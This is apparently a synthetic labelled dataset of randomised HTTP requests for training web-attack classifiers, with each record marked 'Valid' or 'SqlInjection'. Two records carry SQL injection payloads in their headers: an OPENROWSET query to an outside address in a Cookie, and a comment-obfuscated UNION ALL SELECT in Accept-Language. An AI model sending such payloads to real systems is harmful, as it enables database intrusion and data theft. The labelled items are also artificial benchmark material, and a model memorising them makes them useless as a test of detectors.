GET /.OQpmcZUeX-/57aKNY_XJsXp7g/grWn/sWN356nC4Ok/rdle6ain/Hyexcrre1wClR/R8enoTjitB1toi/qFRolQ8@XEfC/d36jutrottt4oQagwsn/TGwhere/okYaP_J/ip2xJig6TI.png?ktceReoiYmdlc=7JQdSw1J6Qo&getcedol6oto2sa=345422047&goitoonretj=cdrxittutmp&EzTtelieni=2&qnph-OPF5rae8@k=SoD&gedaesergnsh=n HTTP/1.0
Host: 189.3.0.128:7437
Connection: close
Accept: text/html;q=0.6, application/postscript;q=0.0, audio/basic
Accept-Charset: iso-10646-ucs-2;q=0.2
Accept-Encoding: *
Accept-Language: esvgb-elee;q=0.2, a-natEcs;q=0.3, omarhwd-ev3moi, Sig0pbjt-usic;q=0.4
Cache-Control: no-store
Client-ip: 182.155.75.50
Cookie: 2eg=7975;beaOmtzmseaMrCN=tGrxMcvfi3q;sntanrtesji=j/n;dhetocyy3it=496;eat=4429103;Hehnamrdi9=30
Cookie2: $Version="31"
Date: Mon, 20 Sep 04 08:37:50 GMT
ETag: "SBLvx3V.@Glr-f1ZA"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Wed, 29 Jul 09 10:54:31 UTC
If-Unmodified-Since: Thu, 20 Sep 07 11:02:11 CET
If-Match: "Md-wd9IeQB1Uc2MG1Wg1"
If-None-Match: *
If-Range: Fri, 13 Jul 07 03:54:21 UTC
Max-Forwards: 383
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dTNpZWZzOElnanR5aWV3YXM1bHJlaHRtc2RyQzZzZGVvd3BpdHQ2emhsdA==
Authorization: Basic c2N0dHRpdG46aW5laXNocg==
Range: 5809-2058
Referer: http://www.tilratoc.com/ummwend/tordsl/Mt8seUim/5elrfke/bant.fgf
TE: trailers
Trailer: Authorization
User-Agent: cShiafHzu (zSqMLY)
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6216x6265
Via: 5.5 www.OuEe.shtml
Transfer-Encoding: eixxrt
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 246.209.203.242
X-Serial-Number: 705834569346
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22605
Start - Id: 27762
class: Valid
GET /zomCWnetcat4LlkZN/sitweecs/lnfitowieIs/ZpWzD.html?5raityoLseh43=488&ncagunhEh0o=8137&Bw6e203i8=3ptrmmba&ig=95758498 HTTP/1.1
Host: www.3bBFj.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, x-mac-ce;q=0.8, shift_jis, x-mac-greek, us-ascii;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.152.43.48
Cookie: M9G2nullB-b_z=tedenoMsolxgseo;ehmeeheorEeN= a;remOGmhed=7F8jkEVkM4.
Cookie2: $Version="3"
Date: Mon, 14 Aug 06 11:31:04 UTC
ETag: "WG9tAJhw@_sxd-8z"
Expect: 100-continue
From: uZwsha@tg2sae.gov
If-Modified-Since: Tue, 12 Aug 08 06:28:59 UTC
If-Unmodified-Since: Sat, 10 Jul 04 11:26:51 GMT
If-Match: "kn6KACgY1Zq6u49AI_"
If-None-Match: *
If-Range: Sun, 17 Dec 06 03:18:07 CET
Max-Forwards: 182
MIME-Version: 2.1
Pragma: fa='t'
Proxy-Authorization: NTLM YWFlbHNueWNyZ0lpd2VhdXd1ZTF0MWVpN2FURXdyenVl
Authorization: Digest username="eohsiyl"
Range: 360141-,-759683
Referer: http://www.mncmxno.cz/q3kewpm/oHedfnx/vRle1/dsztodnl.cfm
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.4 (Windows; U; WinNT 1.2; rj-ep; rv:1.3.2) Gecko/57444938
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 483x5740
Via: 2ce2c/7.6 211.134.208.68, 0sr/5.9 www.0uehdm.shtml, 4.7 193.45.97.196:24
Transfer-Encoding: compress
Upgrade: osynnp/8.4, cny/5.4, axd/4.1
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27762
Start - Id: 8296
class: Valid
GET /eert1t.sh?es7trgaImli=bPVZ&ertMaiemx=6HDsi&aRttlstetrs=nnfjoga&ne2heseiilahs=eneu&npnge=29IDe5&Talxizojoc3ot=2977&Tdy=evar+&obpuoact6icnsnr=6168&nQLtmailZ=rMDq HTTP/1.0
Host: 230.11.210.15
Connection: close
Accept: video/quicktime, application/*;q=0.1, image/png
Accept-Charset: iso-8859-9;q=0.1, gb2312;q=0.2, iso-8859-3, x-mac-arabic;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 165.218.247.238
Cookie: twas4Newster3=5076;b3etbgqnsir7=vbscriptar;swPuyiesmdnni=5022529
Cookie2: $Version="040"
Date: Thu, 21 Feb 08 02:44:02 UTC
ETag: "SF6ntt3pM9U3EuHN@Oj"
Expect: 100-continue
From: epaiNa@tesaenml.net
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Sat, 24 Jun 06 20:03:57 UTC
If-Match: "IbFtWl6Yf_PD3rI02-"
If-None-Match: *
If-Range: *
Max-Forwards: 0195
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVnb2ZoYXNMcHNlT2VwZm5hY2VFZHRoYTNVcmVnaHNTZWFsam90YWxkUmNy
Authorization: Digest nonce
Range: 9-,-1,846-
Referer: /tuRobied/elte/tilsw3/xpyh.asp
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/1.7 (Windows; U; Win98 2.8; Ae-en; rv:2.7.0) Gecko/08845410
UA-CPU: x86
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 138x587
Via: 2.2 www.uaytef.css, 7.1 246.223.142.254:4702
Transfer-Encoding: omit
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 166 128.16.194.221 "tetd7downhmnsrzsiWo" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 02984
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8296
Start - Id: 4797
class: Valid
POST /dKZR-/fVG5phpVSpcQgF9b/tnnz1e3rnEo/childlK9XXY4J5x/hMiYsQgGwXJ/9fVv7IAF8ECv@iIw1-/utylsutoielhS03rtmed/agiqciaiutaT1/bSoqt/aq90sock_streamp0-i/t4JZ1MCk5Qt.jsp? HTTP/1.1
Content-Length: 124
Content-Language: i7nant
Content-Encoding: identity
Content-Location: /nynhhm/nrnft9/lawoi/4hSsIjp/2coOO.mp3
Content-MD5: ZHo3YXNmZGFsZXJZZGRhcA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 23:27:16 UTC
Last-Modified: Sun, 22 Jan 06 16:36:00 GMT
Host: 133.118.77.152
Connection: 3tstss
Accept: video/*;q=0.7
Accept-Charset: iso-8859-6;q=0.2, euc-cn, shift_jis, iso-8859-7;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: yremeu-3a;q=0.7, 8ssNlwc8-1z8e;q=0.6
Cache-Control: no-cache
Client-ip: 42.233.212.25
Cookie: saeelnhheis=16339;ne=aeeM1oeaiono;ds3tnoilcnee=ons1mJoBn2;w4r7gRn=8yOvIrbM;EezttemqerXEee=1161715;kbT7fP=hwrweet7
Cookie2: $Version="4"
Date: Mon, 04 May 09 18:33:32 UTC
ETag: "ov8k5Q.letHDD7S"
Expect: csmPos=ttcnAx
From: otAkg@xeDgx.gov
If-Modified-Since: Thu, 03 Jan 08 03:13:32 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:44:56 UTC
If-Match: "WJbvzUAfie3TWMsijt"
If-None-Match: *
If-Range: Fri, 04 Apr 08 07:28:22 GMT
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic ck9IS2VFczQ6c0VvdQ==
Authorization: Basic cnJPbGY3OnIzNG5vdTY=
Range: -751
Referer: http://oynril.cz/nsocsbR/wumyscs/seuna/irvhke.exe
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 8.9; tt-si; rv:0.8.2) Gecko/45996456
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 904x222
Via: 0.3 www.pa1oy.js, FTP/3.2 www.leiins2.shtml, HTTP/4.6 80.98.146.10
Transfer-Encoding: deflate
Upgrade: smg/9.8, n5os/4.7, tMiW/5.6
Warning: 015 166.151.221.196 "yenbnsehnnhif" 
X-Forwarded-For: 148.27.176.124
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tIshrnnwl=0&eteLrxeebbO=62867196&tsiehsIaereoyl=71354469&qnaBrse5o7e=humftrhn&cobsRtr9aOoir=jfrw85&krd6=29999&ttawd1NtSgr=la

End - Id: 4797
Start - Id: 235
class: Valid
GET /dupdateFgj/b@xNFz_G1d/eocrfstnEeil/uiimx/co/toeep5awueok3i/ol4T/cWXfy_1tK2/en0DsST7zzt42XTVhe/yGtTm_eza/nvJwQK_Fpk8J/ia4itih6uaefgd4iemSo.jpeg?AeSiesme4y=h%3DsD&e3iahelxve1tF=vpPv%402j&dndnewuj4eY=iu%7Ceaccept&2OyMgmd=6&dli=25216&id=seu%3Ahls HTTP/1.0
Host: www.jcloEm.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 209.251.8.51
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Sun, 18 Nov 07 01:03:04 GMT
ETag: "isEz1WpfU9Phbh11J1p"
Expect: 9phztc=orD7bn
From: yeXhbouc@7trpphie.it
If-Modified-Since: Wed, 30 Aug 06 04:15:22 GMT
If-Unmodified-Since: Mon, 22 Dec 08 14:10:10 UTC
If-Match: *
If-None-Match: "zWMriaxSdfSj3LNYfoY"
If-Range: *
Max-Forwards: 8
MIME-Version: 2.4
Pragma: hsm='6eiz'
Proxy-Authorization: hmdlyh t3nfh=ommg
Authorization: Basic dHNhc0UyOmRiMHVvbA==
Range: 46-,9-788359,-8100
Referer: http://www.Istsshl0.cz/cafdttls/TyCt/wiieNsb/cTTTtama.mpg
TE: deflate,deflate,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 1.4; pw-9l; rv:6.0.5) Gecko/72865895
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 0.0 107.224.199.218, HTTP/0.7 64.162.187.92
Transfer-Encoding: identity
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 965 88.177.68.12 "4trBeattamo2onsSyh78" "Mon, 13 Nov 06 23:30:59 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 25177874898076816291
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 235
Start - Id: 32042
class: Valid
GET /51x0jBI/duK_FvEkTgoc.mspx?tedg=14488&oirfih=4&nnpem=8002&teat3oOqighdsl=28278&ht2epeniitwft=6970863960&kb-Vz7RD4@7=tnynoeae6&ye=5&nrtd0g7bneeo=+eeir&includeconnectwI2e=tb&Tndn4=k+ee&Yss=troen&eiy1oemcl34=lso0rotJdanmlentr&f2iebaedb4nc2=2s&ehenhzqs=s%3Ftea&nitc4sS=e%2Fw HTTP/1.0
Host: 50.226.202.220
Connection: close
Accept: application/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 228.12.145.136
Cookie: rTr8isnthmImka=e h;adrs=xa'atamftonlgu;dIt=sstth0insertsei~sio5;vOIjh=31858;zucatE@kWcG-g=Ieqcaccaoy;E5U=;0-httpl
Cookie2: $Version="7"
Date: Sat, 16 Feb 08 13:09:27 CET
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: 7Shh@remFh.cz
If-Modified-Since: Wed, 02 Sep 09 15:15:16 UTC
If-Unmodified-Since: Tue, 30 May 06 03:14:20 GMT
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: "VR8kxpSdkMB-..tGcI"
If-Range: *
Max-Forwards: 5433
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: oEgecn qnatnC=stertreg
Range: 23518-
Referer: http://moihp.gov/genslrn4/obEeuYt/orde/Awla/6yeeut.shtml
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.7 (X11; U; SunOS sun4u 8.7; e6-94; rv:5.8.5) Gecko/51228352
UA-CPU: x86
UA-Disp: 097,6604,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: identity
Upgrade: nswin/2.0, nrnelw/2.2
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 194.242.185.79
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32042
Start - Id: 35115
class: SqlInjection
GET /pg/0dzi9/8kJZ.Pq5Tij5q-TSvE.asmx?asatytLanfotDa=cshinl&Pxlog41J5h=xicmo5EwmAEasho&09deletexml1Cfperl=%24%40xtermceonetcatiaupdate%3Ar+v0&rjeis9nirhoTrnf=dmse08pirclgrlhrsw&gruncio84=032&nbraata8az=ests&36=jce7reyao HTTP/1.1
Host: www.rlenoyaks.org:2059
Connection: aeOh
Accept: video/*;q=0.2, application/x-tar;q=0.0, audio/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: max-stale=7
Cookie: cspihbv1iuyi8io=;     select  *  from  OPENROWSET('SQLoledb','uid=C3cfs;pwd=coiGehh;Network=DBMSSOCN;Address=193.28.89.141,13709;','select    *     from     g4le'    );naeccMriNRsa8=nourtbec;y9ars3ilao=893;Axdiiiaa=eyhiavr;is=eahfFn;g2hcwanod=oxewdyt0zHENne9s
Cookie2: $Version="8"
Date: Thu, 05 Aug 04 14:33:48 GMT
Expect: fybgn
If-Modified-Since: Thu, 28 Sep 06 19:26:55 GMT
If-Unmodified-Since: Thu, 15 May 08 20:56:20 CET
If-Match: *
If-None-Match: "LNFQelfK4An6H4aIKNcg"
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=eeto
Authorization: Digest cnonce="OayUane"
Range: -444440,-61,83757-326236
Referer: /colsem/jaHecfo/vepr/ntri/eca8.jpg
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/0.2 (X11; U; Open BSD i386 6.7; r4-ri; rv:4.4.5) Gecko/42430263
Via: 4.6 57.40.148.33, HTTP/5.2 70.205.108.212
Transfer-Encoding: asNn
Warning: 502 24.120.21.238 "q9oNeeeytxzpYewo" 
X-Serial-Number: 182360849652
----: ----------

null

End - Id: 35115
Start - Id: 42729
class: SqlInjection
POST /script@aDGzVHt.sh? HTTP/1.1
Content-Length: 106
Content-Language: eaj,tkh
Content-Encoding: identity
Content-Location: http://wntsc.gov/lelnlo/thalo/elyefat/pefpaca/ns0o.mpeg
Content-MD5: dDI2Y3VwZGFLZXNud2FuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Dec 04 15:41:38 CET
Host: www.Eeot0.uk
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: ')/**/UNIONALL/**/SELECT/**/91/**/FROM/**/ercU/**/WHERE/**/(   ''=  ' /**/
Cache-Control: no-store
Client-ip: 58.18.176.200
Cookie: vEreplacerP9EorhjL=Enc9genun%at e|A;EUeaoHn1beseu=r2%ttde
Cookie2: $Version="80"
Date: Wed, 07 Feb 07 07:04:15 UTC
ETag: "NbMe7oZgcJBmRk8"
From: 6ueuo@oyblbl9dec.biz
If-Unmodified-Since: Wed, 06 Jan 10 18:21:13 UTC
If-Match: "18xD6p2WGyDJSCPX"
If-None-Match: "CgHj.-oAvd03O.luiTT"
Max-Forwards: 599
Authorization: Basic ZTdlaGM6ZXN1Zw==
Referer: http://www.tsaeoTx.de/lhiiCewp.mdb
TE: deflate;q=0.5,chunked;q=0.2,trailers
User-Agent: oAoThWbrh http://www.Crosa9a.gov
UA-OS: Win98
UA-Color: color32
Via: 0.7 46.123.147.35:0625, FTP/7.0 127.148.14.209, FTP/7.1 159.191.114.4
Transfer-Encoding: identity

if0Rimooezoae=5918014&2Ehtc9toiaosun=tbhtpassg&al=snf0hetsoatlsalqS7services &tSfN=5meus&hsAogyI3=trnuinhq

End - Id: 42729
Start - Id: 14383
class: Valid
GET /weea3edTwrmreAc/somw7nokha7Nkir/a5SbzNOagoCtZOUg4dH/uNtxxdggE-/poln1epNejl9geaim.dll? HTTP/1.1
Host: www.str1besi.be
Connection: close
Accept: image/gif, image/*;q=0.9
Accept-Charset: koi8-r;q=0.2, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 166.239.11.152
Cookie: sioebMHuvihi7=379751;oenh2ccio=1eq0eoidte'
Cookie2: $Version="604"
Date: Sat, 04 Sep 04 18:15:54 CET
ETag: W/"GjGgvGraJvEvMOTxn"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Fri, 03 Mar 06 04:42:21 UTC
If-Match: *
If-None-Match: "@_VS8hO9C@gH1_CJ."
If-Range: *
Max-Forwards: 1939
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: n5ehm8 lhbo=Xlxnp
Authorization: Basic b2dvb246cDhzZHgyamU=
Range: -71089,-74863
Referer: /0uhrsee/Oehsco/a7aej/wshnhb.jpeg
TE: trailers,trailers
Trailer: Accept
User-Agent: ipnt3rg5iTlrterh0
UA-CPU: StrongARM
UA-Disp: 437,7819,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8463x313
Via: HTTP/6.6 www.seew.png, FTP/0.6 www.aEa3ag.gif
Transfer-Encoding: identity
Upgrade: cnx/0.5, so5B/5.3, iap/9.1
Warning: 291 151.81.47.205 "tji08Srmmnz" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 2617540720922658779
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14383
Start - Id: 3700
class: Valid
GET /x7syLW_5/lXRaI4zJYdbhPoVW/Tboot.inic-telnetrmdE0scriptUI_adminw/7lp/50yopgtm11sent/stzyttbwowqy/t3YA3v9x9Nvx7Kl/Ibz/smo49wu27avcbeteaHyo.pl?0raoso=ojnr HTTP/1.1
Host: 36.229.184.147:80
Connection: 0bdmoi
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ymO-nindroae;q=0.2, cue-hz;q=0.7, wlos1ehb-tec;q=0.0, AnzIe-3Sa7, iaiee-u7;q=0.4
Cache-Control: min-fresh=82852
Client-ip: 17.16.115.209
Cookie: D9YYEwflTtS=zrnjhiWgaCOro8ae;prohggieinelc=[nccmdaE;hwnpdeihir75xa=mHq;lsatno=9
Cookie2: $Version="07"
Date: Tue, 10 Jan 06 12:37:55 GMT
ETag: W/"NcXa0Tg5zSehbJglVhI"
Expect: s45e
From: iRudcNke@ssod1rd.fr
If-Modified-Since: Wed, 10 Mar 10 09:05:24 GMT
If-Unmodified-Since: Fri, 30 Jul 04 03:45:21 UTC
If-Match: *
If-None-Match: "zJdqraVS5MSpS87F9S"
If-Range: *
Max-Forwards: 4397
MIME-Version: 3.4
Pragma: t='ylnngt'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM SDg3aUVsaXNlc3REaW9hQ2FDQXNlaUV4ZWRPTkxjZTNvcDVobnJwdA==
Referer: http://www.eakt5e.fr/adhrmgt/eRmxmitl/mhD3ctTe.mdb
TE: trailers,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.9 (compatible; tioe; Open BSD i386; X0ns; mae4steti)
UA-Disp: 7385,2023,32
UA-OS: WinNT
Via: FTP/5.7 101.61.214.115, 1.4 www.nor1pt.jpg:79, FTP/1.7 www.dnitC.jpg:95
Transfer-Encoding: deflate
Upgrade: ree/1.6, rOoW/1.7
Warning: 041 www.3feef5i.htm "ptnhadtdR" "Thu, 04 Oct 07 21:24:59 GMT"
X-Forwarded-For: 150.60.70.152
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3700
Start - Id: 5642
class: Valid
PUT /.YCpsG/CoEd/6Y2sQj_Oi/mmlknEatshldhtor/erapOarNdtnUtatmikbh/pt/brFYw12Q63p1b8s.jsp? HTTP/1.1
Content-Length: 64
Content-Language: oescb4,crco,Aeb3n
Content-Encoding: identity
Content-Location: /aui1.cgi
Content-MD5: aHd0bjZyMTg2Y2VhZWVydA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jun 05 22:58:43 CET
Last-Modified: Tue, 15 Jul 08 02:08:46 CET
Host: 188.49.150.196:8
Connection: close
Accept: text/plain, image/jpeg;q=0.5, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: tbpeb-d;q=0.5, i8YYah-etieemea
Cache-Control: max-age=6671
Client-ip: 222.243.242.243
Cookie: bwhwistefinn=eECin;ispposzetnrIgo=70448352
Cookie2: $Version="980"
Date: Fri, 02 Jun 06 20:37:36 GMT
ETag: W/"_otDYwRkF7H9DxvHeaf"
Expect: 100-continue
From: noeLofs5@rseiiaono.biz
If-Modified-Since: Sun, 25 Oct 09 13:48:50 UTC
If-Unmodified-Since: Thu, 14 May 09 07:15:50 CET
If-Match: "WiB0CkNNK@lFwgi"
If-None-Match: "qm.JUqc76w5U0C8"
If-Range: Mon, 12 Jan 04 06:17:47 GMT
Max-Forwards: 118
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: Digest uri=http://www.usaew0kt.net/la5alH/h2eodtr9/lvdeoa1/ceS1Hps0.txt
Range: 2276-60,56286-,36-07002
Referer: /3rae/oGetkcmo/5wenjsnu/psimm/nrsdla.swf
TE: trailers
Trailer: Accept-Charset
User-Agent: bV72Ye0n http://www.edDvogcg.it
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/0.8 220.164.216.243:0, oqs/3.6 160.220.177.71
Transfer-Encoding: identity
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 312 173.205.198.99 "etrhs" "Tue, 04 May 10 24:10:04 GMT"
X-Forwarded-For: 43.162.121.32
X-Serial-Number: 59672
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eten=sa8ekatra&trteYieaem5reex=80&s1feotexRmhe=97679&ll=93811342

End - Id: 5642
Start - Id: 18802
class: Valid
GET /2.W8b_-hKBQQB9kKsw.cgi? HTTP/1.0
Host: 48.9.57.45:3
Connection: close
Accept: image/*;q=0.5, text/*, video/mpeg;q=0.4
Accept-Charset: euc-cn;q=0.7, windows-1255;q=0.7, iso-8859-8-i;q=0.1, windows-1254, x-mac-arabic
Accept-Encoding: deflate;q=0.0, deflate, compress;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 175.91.184.33
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="83"
Date: Wed, 19 Oct 05 19:54:46 UTC
ETag: W/"3HCs5i7zVg3zw139a8"
Expect: 100-continue
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 29 Jan 09 18:54:19 GMT
If-Unmodified-Since: Tue, 16 Sep 08 11:29:58 UTC
If-Match: "8DoBEgLE@HOo7lwBO8"
If-None-Match: *
If-Range: "391MvLzqg-QzLxJAp"
Max-Forwards: 111
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="oA8Ntdee"
Authorization: Basic czQ5c2ljaXM6bHNzYzZl
Range: -26166
Referer: http://www.wnnaii.gov/aneb.php
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 3.1; ls-iu; rv:5.4.7) Gecko/75839983
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/6.9 115.201.238.149, 9.7 46.154.30.152
Transfer-Encoding: deflate
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18802
Start - Id: 15765
class: Valid
GET /dEaAirmDjtsOtiedez/hoHa1u-loQ/wiMiCzcbEUVj6Ydu@uUQ/ote5tea73o9egasta5/mO2KGx-RCu/sollafihmeSes6anyh/SdO/azi0xQL5C3S@4Mu/eoI_p_n/oselectvbgsoundKCfhttpNsi/5M5CnckmSyX9Ande4fU/imlJU1L5.jsp? HTTP/1.0
Host: 142.207.199.93
Connection: close
Accept: application/*;q=0.2
Accept-Charset: koi8
Accept-Encoding: *;q=0.2
Accept-Language: nwrmsRdl-enTto;q=0.9, uNcitl-owt2w, lt-e, rtdTfQ-uA
Cache-Control: max-stale
Client-ip: 229.38.118.229
Cookie: ay9aoe=3;nYS-G1jGWk=17;vtmn=e4Fg5YBI;lectoasz0lo5m=dcoasDeigzdlintn;nl8P=rtaSia;8JidN=wSooMDe-Qex
Cookie2: $Version="46"
Date: Wed, 10 Dec 08 02:58:00 CET
ETag: "cFaXT@n3DkvQ6DPaZ"
Expect: 100-continue
From: tmcou1ni@As4tTc.be
If-Modified-Since: Thu, 18 Aug 05 12:45:01 GMT
If-Unmodified-Since: Sun, 08 Feb 04 15:38:03 GMT
If-Match: "tNgeGxdO2JSSu4ZLfs4"
If-None-Match: "Aiev9M6YPfOxLIr"
If-Range: "ZttnOsu5Y1ryFKy"
Max-Forwards: 420
MIME-Version: 4.2
Pragma: teaeaq7='ir'
Proxy-Authorization: rdeecp hstia9su=nqvl
Authorization: Basic OWVkc3RuOm54bHNy
Range: 4745-,-48,7-8
Referer: http://www.3twbhss.biz/aTGt5c/e0mrnH/Tnsoniua.msf
TE: chunked;q=0.4,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (X11; U; Open BSD i586 1.3; 9c-8h; rv:3.7.8) Gecko/72382314
UA-CPU: StrongARM
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 055x984
Via: 2t4egg/7.1 41.0.30.59, FTP/2.6 www.a7nallfb.tiff
Transfer-Encoding: gzip
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15765
Start - Id: 19684
class: Valid
GET /TilenoerdiaSmo/tLycB/ri_VxxxFd/LOkHY6PgBI3X/zU1/qaT7sahda/Pk6H/feuastt06gacrelc/Otteasgwne1oilea/iampleOedo7reOmclnrn.asp?orthosTrnresf=kps+mwinnt&ytybw9Ofboh=saf-b&Fhrnaquettpetu=hen5nzen&rnfuCtdoy=dmxenStlddHb HTTP/1.0
Host: 172.80.100.11
Connection: eqchru
Accept: application/*
Accept-Charset: x-mac-ce;q=0.5
Accept-Encoding: 
Accept-Language: hTttn7-tB, t-gn1tdcg, rolr4nc-hedhN;q=0.4, vS-hE;q=0.5
Cache-Control: no-transform
Client-ip: 25.33.202.208
Cookie: dxnm=gWJXhYzzl;yparhilbeaxb8ey=71985;nn7t7n3rquLj=6060;YSpNJJuvkbbine=99252433;autoexecSshutdownK=includeDxuiraoOyMs;yg4a@=1ttbhiframeadxo0;i n
Cookie2: $Version="9"
Date: Tue, 03 Apr 07 22:13:39 CET
ETag: "O90S3RZvs0iyNJ3TSa6"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Thu, 17 Jul 08 09:31:02 UTC
If-Unmodified-Since: Thu, 29 Jul 04 12:16:24 UTC
If-Match: *
If-None-Match: "u.sw4eaffbm07UM3"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Basic ZXVsYTloZTE6OXJudA==
Range: 921246-43
Referer: /todezhh/eaolee/ttvidsT/t5necrtn.bin
TE: deflate,gzip;q=0.7
Trailer: Host
